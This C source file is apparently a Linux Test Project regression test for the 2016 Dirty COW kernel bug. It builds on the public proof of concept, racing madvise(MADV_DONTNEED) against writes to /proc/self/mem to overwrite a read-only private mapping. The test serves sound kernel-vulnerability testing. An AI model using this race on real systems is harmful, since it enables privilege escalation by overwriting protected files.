1 /*
2 * Copyright (c) 2016 Cyril Hrubis <chrubis@suse.cz>
3 * Based on: https://github.com/dirtycow/dirtycow.github.io
4 *
5 * This program is free software: you can redistribute it and/or modify
6 * it under the terms of the GNU General Public License as published by
7 * the Free Software Foundation, either version 2 of the License, or
8 * (at your option) any later version.
9 *
10 * This program is distributed in the hope that it will be useful,
11 * but WITHOUT ANY WARRANTY; without even the implied warranty of
12 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 * GNU General Public License for more details.
14 *
15 * You should have received a copy of the GNU General Public License
16 * along with this program. If not, see <http://www.gnu.org/licenses/>.
17 */
18
19 #include <sys/mman.h>
20 #include <fcntl.h>
21 #include <pthread.h>
22 #include <unistd.h>
23 #include <sys/stat.h>
24 #include <string.h>
25 #include <stdlib.h>
26 #include <stdint.h>
27 #include <pwd.h>
28
29 #include "tst_safe_pthread.h"
30 #define TST_NO_DEFAULT_MAIN
31 #include "tst_test.h"
32
33 #define FNAME "test"
34 #define STR "this is not a test\n"
35
36 static char *str = "m00000000000000000";
37 static void *map;
38 static int mfd;
39
40 /*
41 * You have to race madvise(MADV_DONTNEED) ::
42 * https://access.redhat.com/security/vulnerabilities/2706661
43 *
44 * This is achieved by racing the madvise(MADV_DONTNEED) system call while
45 * having the page of the executable mmapped in memory.
46 */
madvise_thread(void * arg)47 static void *madvise_thread(void *arg)
48 {
49 int c = 0;
50
51 (void)arg;
52
53 while (1)
54 c += madvise(map, 100, MADV_DONTNEED);
55
56 tst_res(TINFO, "madvise: %i", c);
57
58 return NULL;
59 }
60
61 /*
62 * You have to write to /proc/self/mem ::
63 * https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
64 *
65 * The in the wild exploit we are aware of doesn't work on Red Hat Enterprise
66 * Linux 5 and 6 out of the box because on one side of the race it writes to
67 * /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise
68 * Linux 5 and 6.
69 */
proc_self_mem_thread(void * arg)70 void *proc_self_mem_thread(void *arg)
71 {
72 int c = 0;
73
74 (void)arg;
75
76 while (1) {
77 lseek(mfd, (uintptr_t) map, SEEK_SET);
78 c += write(mfd, str, strlen(str));
79 }
80
81 tst_res(TINFO, "write: %i", c);
82
83 return NULL;
84 }
85
sighandler(int sig)86 void sighandler(int sig)
87 {
88 (void) sig;
89
90 _exit(0);
91 }
92
93 /*
94 * You have to use MAP_PRIVATE for copy-on-write mapping.
95 * Create a private copy-on-write mapping. Updates to the
96 * mapping are not visible to other processes mapping the same
97 * file, and are not carried through to the underlying file. It
98 * is unspecified whether changes made to the file after the
99 * mmap() call are visible in the mapped region.
100 */
main(void)101 int main(void)
102 {
103 pthread_t pth1, pth2;
104 int fd;
105 struct stat st;
106
107 tst_reinit();
108
109 SAFE_SIGNAL(SIGUSR1, sighandler);
110 TST_CHECKPOINT_WAKE(0);
111
112 /* Open it read only and map */
113 fd = SAFE_OPEN(FNAME, O_RDONLY);
114 SAFE_FSTAT(fd, &st);
115
116 map = SAFE_MMAP(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
117 mfd = SAFE_OPEN("/proc/self/mem", O_RDWR);
118
119 /* Try to rewrite it */
120 SAFE_PTHREAD_CREATE(&pth1, NULL, madvise_thread, NULL);
121 SAFE_PTHREAD_CREATE(&pth2, NULL, proc_self_mem_thread, NULL);
122
123 pause();
124
125 return 0;
126 }
127